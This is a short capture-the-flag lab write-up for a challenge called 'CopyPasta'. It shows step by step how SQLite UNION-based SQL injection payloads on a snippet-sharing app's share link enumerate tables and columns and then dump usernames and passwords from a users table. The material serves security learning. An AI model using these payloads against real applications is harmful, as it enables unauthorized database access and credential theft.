# CopyPasta

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FUxPy3irXEpwX3czd9ALv%2Fimage.png?alt=media&#x26;token=c6821f02-184c-4f30-9bb1-5c8a84e29ed4" alt=""><figcaption></figcaption></figure>

after viewing any snippet, we have option to share, which gives us link of snippet

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2Fl5eSIBt9cmujnNy7K65m%2Fimage.png?alt=media&#x26;token=e8e5020f-a725-4c9e-98c3-3c3f123f047b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2Fp6Yuo7HiXcPo9pSEjyR5%2Fimage.png?alt=media&#x26;token=dc0f37e9-e86e-45e8-ae71-c596c3a752ac" alt=""><figcaption></figcaption></figure>

Possible SQLi

Using simple payload `' or 1=1— -` proves, it is vulnerable to SQLi

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FIYHtw2pv2HAae4RCxTXw%2Fimage.png?alt=media&#x26;token=1e05994c-5e5a-4e3a-ad4e-100e9c19946e" alt=""><figcaption></figcaption></figure>

finding number of columns

`' order by 7-- -` gives error, hence the number of column is 6

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FClRhYN8BF5MaXGVIYyd9%2Fimage.png?alt=media&#x26;token=c9cc6929-7ce4-46fd-b9e0-286bfb474460" alt=""><figcaption></figcaption></figure>

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FBUt8wsPr5cEpcmEVHuLW%2Fimage.png?alt=media&#x26;token=206d79e1-7f72-49d6-87d6-e14f3b791a79" alt=""><figcaption></figcaption></figure>

using `' union select 1,2,3,4,5,sqlite_version()-- -` confirm database is sqlite, [visit here for more info](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification)&#x20;

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F60uB6MQBvsGpxth0MQnA%2Fimage.png?alt=media&#x26;token=da031fd6-f164-4272-b146-706f3b88bf2d" alt=""><figcaption></figcaption></figure>

dumping table names using

```
' union select 1,2,3,4,5,group_concat(tbl_name) from sqlite_master where type='table'-- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FJwuGd7PBYsGq45gcHYrO%2Fimage.png?alt=media&#x26;token=9adb5bc7-bf31-437e-b5d6-05fbaad1ee46" alt=""><figcaption></figcaption></figure>

`users` table looks interesting.

Next: dumping column names from table `users`

```
' union select 1,2,3,4,5,group_concat(name) from PRAGMA_TABLE_INFO('users')-- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FfhBf9gHu8pAdRkwOOVjh%2Fimage.png?alt=media&#x26;token=0916d70a-c9c5-4552-8b84-94f142903a58" alt=""><figcaption></figcaption></figure>

dumping `username` and `password` columns from `users` table

```
' union select 1,2,3,4,username,password from users-- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FyOjIYNLhHsH4nQOHPPSI%2Fimage.png?alt=media&#x26;token=a753c356-52ad-4f25-8f88-b8ca3759d7cf" alt=""><figcaption></figcaption></figure>